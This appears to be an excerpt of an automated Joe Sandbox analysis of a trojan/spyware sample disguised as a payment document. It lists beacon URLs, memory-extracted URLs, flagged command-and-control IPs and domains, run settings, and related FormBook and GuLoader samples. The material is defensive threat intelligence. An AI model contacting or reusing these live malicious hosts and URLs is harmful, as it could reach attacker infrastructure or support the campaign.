                                                                                          http://www.basicreviews.online/3xn5/?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&mTkD=Gj2Ti2T0g4true
                                                                                            		unknown
                                                                                            http://www.adsa6c.top/wr26/?ZT=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&mTkD=Gj2Ti2T0g4true
                                                                                              		unknown
                                                                                              http://www.stationseek.online/wd23/true
                                                                                                		unknown
                                                                                                http://www.297676.com/xyex/?ZT=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&mTkD=Gj2Ti2T0g4true
                                                                                                  		unknown
                                                                                                  http://www.stationseek.online/wd23/?ZT=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&mTkD=Gj2Ti2T0g4true
                                                                                                    		unknown
                                                                                                    http://www.cesach.net/dma3/true
                                                                                                      		unknown
                                                                                                      http://www.simplek.top/ep69/?ZT=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&mTkD=Gj2Ti2T0g4true
                                                                                                        		unknown
                                                                                                        http://www.simplek.top/ep69/true
                                                                                                          		unknown

                                                                                                          URLs from Memory and Binaries

                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                          https://duckduckgo.com/chrome_newtabsysteminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designersGPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/ac/?q=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.fontbureau.com/designers/?Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.founder.com.cn/cn/bThePayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://piensasolutions.com/css/parking2.csssysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.fontbureau.com/designers?Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://www.west.cn/services/mail/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.tiro.comPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://piensasolutions.com/imgs/parking/icon-desplegar.jpgsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://www.stationseek.online/wd23?ZT=hRp9systeminfo.exe, 00000007.00000002.4149067807.000000000591E000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000031FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fontbureau.com/designersPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://www.goodfont.co.krPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correosysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campasysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.sajatypeworks.comPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.typography.netDPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://www.google.comsysteminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.0000000005F66000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003846000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://www.founder.com.cn/cn/cThePayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://www.galapagosdesign.com/staff/dennis.htmPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsysteminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.galapagosdesign.com/DPleasePayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://www.west.cn/cloudhost/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.west.cn/ykj/view.asp?domain=cotti.clubsysteminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://www.fonts.comPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.sandoll.co.krPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.urwpp.deDPleasePayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://www.zhongyicts.com.cnPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensasysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.sakkal.comPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wesysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_campsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://www.extrime1.shopoDnyHukDVUZk.exe, 00000008.00000002.4150364860.0000000004AD4000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://www.strato.deoDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002D48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://www.fontbureau.comPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://www.west.cn/services/webhosting/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?ZT=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpsysteminfo.exe, 00000007.00000002.4149067807.000000000628A000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://plus.google.com/u/0/102310483732773374239systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.west.cn/services/domain/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.ecosia.org/newtab/systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-hosting.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://piensasolutions.com/imgs/parking/icon-web.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.carterandcone.comlPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://www.fontbureau.com/designers/cabarga.htmlNPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.founder.com.cn/cnPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlPayment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=domsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://piensasolutions.com/imgs/parking/icon-parking.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.west.cn/jiaoyi/systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.jiyu-kobo.co.jp/Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://piensasolutions.com/imgs/parking/icon-facebook-small.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.fontbureau.com/designers8Payment&WarantyBonds.exe, 00000000.00000002.1750694598.0000000006BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://piensasolutions.com/imgs/parking/icon-twitter-small.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://twitter.com/piensasolutionssysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngsysteminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              		unknown

                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public IPs

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              172.67.154.67
                                                                                                                                                                              		www.091210.xyzUnited States
                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                              13.248.169.48
                                                                                                                                                                              		www.xipowerplay.xyzUnited States
                                                                                                                                                                              		16509AMAZON-02UStrue
                                                                                                                                                                              20.2.249.7
                                                                                                                                                                              		www.adsa6c.topUnited States
                                                                                                                                                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                              144.76.190.39
                                                                                                                                                                              		basicreviews.onlineGermany
                                                                                                                                                                              		24940HETZNER-ASDEtrue
                                                                                                                                                                              199.59.243.227
                                                                                                                                                                              		www.297676.comUnited States
                                                                                                                                                                              		395082BODIS-NJUStrue
                                                                                                                                                                              217.160.0.60
                                                                                                                                                                              		solarand.onlineGermany
                                                                                                                                                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                              198.251.84.200
                                                                                                                                                                              		stationseek.onlineUnited States
                                                                                                                                                                              		53667PONYNETUStrue
                                                                                                                                                                              161.97.142.144
                                                                                                                                                                              		www.030002059.xyzUnited States
                                                                                                                                                                              		51167CONTABODEtrue
                                                                                                                                                                              203.161.49.193
                                                                                                                                                                              		www.simplek.topMalaysia
                                                                                                                                                                              		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                              103.120.80.111
                                                                                                                                                                              		www.cotti.clubHong Kong
                                                                                                                                                                              		139021WEST263GO-HKWest263InternationalLimitedHKtrue
                                                                                                                                                                              34.92.128.59
                                                                                                                                                                              		www.sgland06.onlineUnited States
                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                              3.33.130.190
                                                                                                                                                                              		iampinky.infoUnited States
                                                                                                                                                                              		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                              152.42.255.48
                                                                                                                                                                              		extrime1.shopUnited States
                                                                                                                                                                              		81NCRENUStrue
                                                                                                                                                                              217.76.156.252
                                                                                                                                                                              		www.cesach.netSpain
                                                                                                                                                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1545186
                                                                                                                                                                              Start date and time:2024-10-30 08:08:48 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 10m 48s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:9
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:2
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:Payment&WarantyBonds.exe
                                                                                                                                                                              (renamed file extension from bat to exe)
                                                                                                                                                                              Original Sample Name:Payment&WarantyBonds.bat
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@18/14
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 75%
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 92%
                                                                                                                                                                              • Number of executed functions: 99
                                                                                                                                                                              • Number of non-executed functions: 219
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                              Warnings

                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • VT rate limit hit for: Payment&WarantyBonds.exe

                                                                                                                                                                              Simulations

                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              03:09:46API Interceptor1x Sleep call for process: Payment&WarantyBonds.exe modified
                                                                                                                                                                              03:10:55API Interceptor8702789x Sleep call for process: systeminfo.exe modified

                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                              IPs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              13.248.169.48HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.yanta.org/1nfd/
                                                                                                                                                                              INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.tangible.online/5byq/
                                                                                                                                                                              SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.telforce.one/ykhz/
                                                                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.proworker.shop/0z5y/
                                                                                                                                                                              19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.moneta.life/t37h/
                                                                                                                                                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                              • www.findbc.com/
                                                                                                                                                                              Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.lunch.delivery/qwed/
                                                                                                                                                                              FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • www.how2.guru/7eim/
                                                                                                                                                                              General terms and conditions of sale - Valid from 10202024 to 12312024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.sleepstudy.clinic/qb3j/?ldz=rxiD0VSh&jB=cFuFzZ3YvTtiHrP9YgB50pNFy1R7naj/7FPBP4W+y4TnGL17Vly9WSpF5ldignjoFUjCQ6N7kk5Em/mIXQaOgZKVJHh7DFNdo3QSNa+0F8GHeDzAsg==
                                                                                                                                                                              zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • www.3808.app/t4fd/
                                                                                                                                                                              20.2.249.7REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              PO 18-3081.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/sb22/
                                                                                                                                                                              rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/vawg/
                                                                                                                                                                              INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              PI#220824.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.8auvih.top/iwsn/
                                                                                                                                                                              PURCHASE ORDER_330011 SEPTEMBER 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • www.km7ky4.top/bx7a/
                                                                                                                                                                              PI #9100679047.exeGet hashmaliciousFormBookBrowse
